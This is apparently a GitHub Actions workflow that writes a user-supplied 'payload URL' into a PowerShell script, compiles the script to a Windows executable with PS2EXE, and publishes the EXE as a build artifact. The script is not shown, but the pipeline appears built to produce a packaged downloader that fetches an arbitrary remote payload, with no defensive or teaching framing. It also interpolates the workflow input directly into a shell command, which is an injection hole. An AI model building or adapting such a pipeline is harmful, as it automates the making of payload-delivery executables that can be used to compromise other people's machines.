name: Build and Update Static Code

on:
  workflow_dispatch:
    inputs:
      payload_url:
        description: 'URL to fetch payload'
        required: true
        type: string

jobs:
  build:
    runs-on: windows-latest

    steps:
    # Step 1: Check out the repository
    - name: Checkout code
      uses: actions/checkout@v3

    # Step 2: Set up PowerShell environment (PS2EXE requires PowerShell)
    - name: Set up PowerShell
      uses: actions/setup-powershell@v2

    # Step 3: Install PS2EXE and any necessary modules
    - name: Install PS2EXE and Dependencies
      shell: pwsh
      run: |
        Install-Module -Name PS2EXE -Force -SkipPublisherCheck

    # Step 4: Update the payload URL dynamically in static_code.ps1
    - name: Update URL in static_code.ps1
      shell: pwsh
      run: |
        echo "Updating the payload URL dynamically..."
        $url = '${{ github.event.inputs.payload_url }}'
        $fileContent = Get-Content static_code.ps1
        $updatedContent = $fileContent -replace 'url = "https://example.com/payload"', "url = `"$url`""
        $updatedContent | Set-Content static_code.ps1
        echo "[INFO] URL updated in static_code.ps1."

    # Step 5: Convert PowerShell script to executable using PS2EXE
    - name: Convert PowerShell Script to Executable
      shell: pwsh
      run: |
        Write-Host "[INFO] Converting PowerShell script to EXE using PS2EXE..."
        ps2exe .\static_code.ps1 .\static_code.exe

    # Step 6: List the contents of the output directory
    - name: List contents of the output directory
      run: |
        echo "[INFO] Listing contents of the output directory..."
        dir

    # Step 7: Upload the executable as an artifact
    - name: Upload executable
      uses: actions/upload-artifact@v4
      with:
        name: static_code_exe
        path: static_code.exe
        if-no-files-found: warn
        compression-level: 6
        overwrite: false
